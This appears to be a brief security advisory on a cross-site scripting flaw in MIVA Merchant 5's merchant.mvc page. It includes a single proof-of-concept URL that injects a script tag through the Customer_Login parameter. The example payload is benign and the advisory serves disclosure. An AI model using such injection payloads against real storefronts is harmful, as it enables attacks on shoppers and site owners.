|
MIVA Merchant 5 Merchant.MVC Cross-Site Scripting Vulnerability
No exploit is required. An example has been provided: http://www.example.com/mm5/merchant.mvc&Screen=ACNT&Action=EMPW&Customer_Login="><script>document.write("\n<br><input%20type=text%20name=somenewfield%20value='Hello%20World'>")</script> |
|
|
Privacy Statement |